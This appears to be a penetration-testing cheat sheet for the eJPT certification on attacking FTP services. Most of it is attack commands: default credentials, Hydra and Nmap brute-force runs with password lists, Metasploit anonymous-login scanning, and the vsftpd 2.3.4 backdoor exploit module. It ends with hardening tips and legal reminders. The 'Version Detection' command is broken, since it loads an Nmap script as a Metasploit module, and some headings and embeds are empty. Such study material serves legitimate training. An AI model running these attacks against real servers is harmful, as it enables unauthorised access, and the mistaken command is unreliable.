# FTP 21 Today I will share some basic commands used to attack the FTP service on eJPT Certification, if you want to learn more about Hacking FTP Server read section dedicated to it. {% embed url="" %} ### What is the FTP Protocol? ### Default Credentials ``` guest:guest anonymous:anonymous ``` ### Version Detection ``` use exploit/unix/ftp/tftp-enum.nse set RHOSTS set RPORT 21 ``` ### How to Brute force FTP Services ``` hydra -l admin -P Top_100_Passwords.txt ftp://localhost/ ``` ``` nmap --script ftp-brute -p 21 --script-args userdb=/root/Top_10_UserAdmins.txt,passdb=root/Top_100_Passwords.txt ``` ``` msf6 > use auxiliary/scanner/ftp/anonymous ``` ![](https://728313659-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1lnNWwxLKiJYALS8pEVG%2Fuploads%2FGWq9r9j1OTArudMvD1jz%2Fimage.png?alt=media\&token=356c222a-05b7-42da-b3e8-a5efc0fd39f2) ``` set RHOSTS nerdherd.thm set RPORT 21 run ``` ![](https://728313659-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1lnNWwxLKiJYALS8pEVG%2Fuploads%2F7ILKj8CLWOtENHZr6PEC%2Fimage.png?alt=media\&token=6a1b38f7-8216-4505-90ae-5b850fa94f27) ### How to Exploit vsftpd 2.3.4 Backdoor ``` use exploit/unix/ftp/vsftpd_234_backdoor ``` ### Nmap NSE Scripts for FTP ``` ┌──(rfs㉿PopLabSec)-[~] └─$ ls -la /usr/share/nmap/scripts | grep -e "ftp" -rw-r--r-- 1 root root 4530 Jan 18 09:54 ftp-anon.nse -rw-r--r-- 1 root root 3253 Jan 18 09:54 ftp-bounce.nse -rw-r--r-- 1 root root 3108 Jan 18 09:54 ftp-brute.nse -rw-r--r-- 1 root root 3272 Jan 18 09:54 ftp-libopie.nse -rw-r--r-- 1 root root 3290 Jan 18 09:54 ftp-proftpd-backdoor.nse -rw-r--r-- 1 root root 3768 Jan 18 09:54 ftp-syst.nse -rw-r--r-- 1 root root 6021 Jan 18 09:54 ftp-vsftpd-backdoor.nse -rw-r--r-- 1 root root 5923 Jan 18 09:54 ftp-vuln-cve2010-4221.nse -rw-r--r-- 1 root root 5736 Jan 18 09:54 tftp-enum.nse ``` {% embed url="" %} {% embed url="" %} {% embed url="" %} #### Setting Up FTP Server for Penetration Testing To set up an FTP server environment for testing the vulnerability, you can use Docker or setup an environment manually: ``` docker run -d -p 21:21 -p 20:20 -p 21000-21010:21000-21010 --name ftp_server fauria/vsftpd ``` #### Securing the FTP Service Once the vulnerabilities are identified and exploited, as a responsible security professional, it is important to secure the FTP server: * Change the default credentials. * Disable anonymous access if it's not necessary. * Use strong passwords and employ password management policies. * Keep FTP server software up to date with the latest security patches. * Consider using secure versions like SFTP (SSH File Transfer Protocol) or FTPS (FTP Secure) which provide encryption. #### Legal and Ethical Considerations Before engaging in any penetration testing activity, always: * Get explicit written permission from the owner of the FTP server. * Follow the scope of the agreed terms and conditions to avoid legal issues. * Be ethical and responsible with the data and access privileges obtained during testing. * Report all findings to the server owner and provide recommendations for securing their systems. #### Conclusion FTP, being one of the oldest file transfer protocols, is vulnerable to various attacks. Use this guide responsibly, always within the legal frameworks, and contribute to a more secure digital environment. [FTP Penetration Testing](https://www.poplabsec.com/ftp-penetration-testing/)